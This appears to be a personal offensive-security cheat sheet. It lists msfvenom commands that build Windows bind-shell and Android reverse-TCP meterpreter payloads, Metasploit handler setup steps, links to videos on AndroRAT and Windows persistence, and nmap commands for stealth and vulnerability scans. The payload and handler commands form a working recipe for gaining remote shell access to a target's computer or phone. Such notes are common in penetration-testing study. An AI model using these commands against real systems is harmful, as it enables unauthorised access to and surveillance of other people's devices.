MSFWORKS-----------------------------------------------------------------------------------------------------------------------------
stage 1:

windows bind shell creation--------------------------------------------------------
msfvenom -p windows/meterpreter/bind_tcp -f exe > ~/shell_code/bind.exe

android bind shell creation--------------------------------------------------------
msfvenom -p android/meterpreter/reverse_tcp LHOST=...  LPORT=... R > ~/shell_code/bind.apk

stage 2:
use exploit/multi/handler
set payload <path/to/payload/payload_name>
in case of bind_shell_tcp, write "set rhost <target ip>" and "set lport <port>"
show options     -----    shows the missing fields
set lhost/lport <input> [ip address of kali machine in case of reverse tcp] eg:[set lhost 192.168.56.34]
exploit
help    ------   show a list of commands of what we can do
msfconsole -r /path/to/list.txt = msf custop scritp run 
windows persistance and handler script vid = https://www.youtube.com/watch?v=bTun7InPfew&list=PLBf0hzazHTGMoQ4B8dXy4kpPoo7ibemEm&index=7
source:
android = metasploit android = https://www.youtube.com/watch?v=YRm-St0bJhU&ab_channel=LoiLiangYang
windows = https://www.youtube.com/watch?v=ivpmlbt729k&t=4s

ANDRORATWORKS-------------------------------------------------------------------------------------------------------------------------
sources 
= https://www.youtube.com/watch?v=QxRy9sVUMQU = androrat
= https://www.youtube.com/watch?v=L6zL4X5yE5A = adb and scrcpy
= https://www.youtube.com/watch?v=wDwhxPwpznE = bind and ui

NMAPWORKS-----------------------------------------------------------------------------------------------------------------------------
nmap -sn 192.168.0.0/24 = - scan network, quick scan of all the connected devices of a network
nmap <specific device ip> = quick scan of a device and see its running services
nmap <specific device ip> --script=vulners.nse -sV = comprehensive vaulnerability scan of a device
sudo nmap --script vuln <target ip address> = scan a device with all vaulnerability scripts
sudo nmap -sS 192.168.0.0/24 = stealth scan of the entire network
sudo nmap -sS <target ip address> = stealth scan a device
sudo nmap -O <target ip address> = guess target os
sudo nmap -A <target ip address> =  very detailed scan of target device

